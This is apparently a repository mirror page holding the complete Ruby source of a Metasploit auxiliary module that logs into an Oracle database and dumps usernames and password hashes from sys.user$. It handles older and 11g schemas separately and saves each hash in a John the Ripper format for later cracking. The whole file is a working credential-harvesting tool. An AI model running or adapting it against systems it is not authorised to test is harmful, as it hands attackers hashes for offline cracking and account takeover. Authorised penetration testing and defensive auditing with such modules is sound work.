Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

oracle_hashdump.rb 3.6KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140
  1. ##
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5. require 'msf/core'
  6. class MetasploitModule < Msf::Auxiliary
  7. include Msf::Exploit::ORACLE
  8. include Msf::Auxiliary::Report
  9. include Msf::Auxiliary::Scanner
  10. def initialize
  11. super(
  12. 'Name' => 'Oracle Password Hashdump',
  13. 'Description' => %Q{
  14. This module dumps the usernames and password hashes
  15. from Oracle given the proper Credentials and SID.
  16. These are then stored as creds for later cracking.
  17. },
  18. 'Author' => ['theLightCosine'],
  19. 'License' => MSF_LICENSE
  20. )
  21. end
  22. def run_host(ip)
  23. return if not check_dependencies
  24. # Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
  25. # Also, 11g uses SHA-1 while 8g-10g use DES
  26. is_11g=false
  27. query = 'select * from v$version'
  28. ver = prepare_exec(query)
  29. if ver.nil?
  30. print_error("An Error has occured, check your OPTIONS")
  31. return
  32. end
  33. unless ver.empty?
  34. if ver[0].include?('11g')
  35. is_11g=true
  36. print_status("Server is running 11g, using newer methods...")
  37. end
  38. end
  39. this_service = report_service(
  40. :host => datastore['RHOST'],
  41. :port => datastore['RPORT'],
  42. :name => 'oracle',
  43. :proto => 'tcp'
  44. )
  45. tbl = Rex::Text::Table.new(
  46. 'Header' => 'Oracle Server Hashes',
  47. 'Indent' => 1,
  48. 'Columns' => ['Username', 'Hash']
  49. )
  50. # Get the usernames and hashes for 8g-10g
  51. begin
  52. if is_11g==false
  53. query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
  54. results= prepare_exec(query)
  55. unless results.empty?
  56. results.each do |result|
  57. row= result.split(/,/)
  58. tbl << row
  59. end
  60. end
  61. # Get the usernames and hashes for 11g
  62. else
  63. query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
  64. results= prepare_exec(query)
  65. #print_status("Results: #{results.inspect}")
  66. unless results.empty?
  67. results.each do |result|
  68. row= result.split(/,/)
  69. row[2] = 'No'
  70. tbl << row
  71. end
  72. end
  73. end
  74. rescue => e
  75. print_error("An error occured. The supplied credentials may not have proper privs")
  76. return
  77. end
  78. print_status("Hash table :\n #{tbl}")
  79. report_hashes(tbl, is_11g, ip, this_service)
  80. end
  81. def report_hashes(table, is_11g, ip, service)
  82. # Reports the hashes slightly differently depending on the version
  83. # This is so that we know which are which when we go to crack them
  84. if is_11g==false
  85. jtr_format = "des"
  86. else
  87. jtr_format = "raw-sha1"
  88. end
  89. service_data = {
  90. address: Rex::Socket.getaddress(ip),
  91. port: service[:port],
  92. protocol: service[:proto],
  93. service_name: service[:name],
  94. workspace_id: myworkspace_id
  95. }
  96. table.rows.each do |row|
  97. credential_data = {
  98. origin_type: :service,
  99. module_fullname: self.fullname,
  100. username: row[0],
  101. private_data: row[1],
  102. private_type: :nonreplayable_hash,
  103. jtr_format: jtr_format
  104. }
  105. credential_core = create_credential(credential_data.merge(service_data))
  106. login_data = {
  107. core: credential_core,
  108. status: Metasploit::Model::Login::Status::UNTRIED
  109. }
  110. create_credential_login(login_data.merge(service_data))
  111. end
  112. print_status("Hash Table has been saved")
  113. end
  114. end